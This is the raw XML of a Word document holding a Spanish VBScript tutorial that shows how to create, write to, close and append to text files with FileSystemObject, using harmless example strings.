          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuarta líne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close</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que cierra el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e impide volver a usar las funciones de escritura</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>necesario cerrar siempre el archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para no causar errores, al finalizar de escribir en él.</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Hay más funciones de escritura. Estas son: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WriteLin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WriteBlankLines</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. La función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Write </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">escribe en una línea el texto que quieres, pero si usas dos, no cambia de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>línea</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sino que sigue en la misma, escribiendo a continuación de donde lo dejó:</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 fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\ArchivoPrueba.txt"</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True</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) var.write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("Este es el contenido") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var.write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(" del archivo.")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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Este es el contenido del archivo. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En cambio, la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteLine, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escribe el texto que introduces en una línea, pero si pones dos o mas, cada nueva que pongas se escribirá en una línea diferent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 fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\ArchivoPrueba.txt"</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True</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) var.writeline</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("Este es el contenido") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var.writeline</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(" del archivo.")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p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>
        <w:ind w:left="71" w:right="6012"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este es el contenido del archiv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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>último</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteBlankLines </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escribe tantas líneas vacías como le indiques; donde 2, es el número de líneas que quieres que baj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 fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\ArchivoPrueba.txt"</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True</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) var.writeline</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("Este es el contenido") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>var.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>writeblankline</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var.writeline</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(" del archivo.")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p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="542"/>
        <w:ind w:left="93" w:right="534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escribirá en el archivo: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este es el contenido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>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del archiv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último lugar, en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">cuarta línea </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se escribe </w:t>
      </w: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como he dicho antes)</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para cerrar el archivo. No se debe omitir (Recuerda qu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es una variable). Así finaliza la explicación de crear un archivo nuevo y escribir en él. Pero… ¿Y si lo que queremos es abrir uno que ya existe y escribir a partir del final (anexarle datos)? La siguiente función necesita el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y permite escribir en el final de un archivo, a continuación de lo que había. La diferencia entre esta función y la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateTextFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es que en esta no borras lo que había escrito a no ser que indiques lo contrario y en la otra si, además, esta función no crea un archivo y luego escribe en el, sino que abre un archivo que ya existe para escribir en él. Se coloca de la siguiente form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arc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("c:\ArchivoPrueba.txt") Set esc = arc.OpenAsTextStream(8)</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esc.Write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Texto que se escribe o se anexa en el archivo" esc.Clos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la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos el objeto. En la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segunda línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando el objeto usamos la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">GetFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(que lleva delante unido por un punto (.) la variable (fso) que guarda el objeto). Dentro de la función colocamos primero la ruta, que en este caso es el disco duro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seguido de \ y el nombre del archivo, un punto y su extensión. Esta función abrirá el archivo que le hayamos indicado. Todo esto esta unido a una variable mediante </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, esto guarda la estructura del archivo que hemos abierto en la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (que se puede usar para funciones como Size).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la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tercera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usamos la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OpenAsTextStream</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> unido a arc para indicarle como queremos editar el archivo cuya estructura </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">está en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si colocamos 2, lo sobrescribiremos (borras y escribes desde el principio) y tendrá la misma función que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateTextFile, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en cambio, si colocamos 8, anexará al final del archivo el texto que queramos escribir. Esto, va unido a una variable llamada </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que guardará la estructura del archivo con las propiedades de escritur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la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuarta línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usamos la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (que contiene los datos del archivo y el modo de edición) seguido de un punto y la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que dentro de ella lleva lo que queramos escribir en el archivo. Aquí se pueden usar las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">constantes de VBScript (menos la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
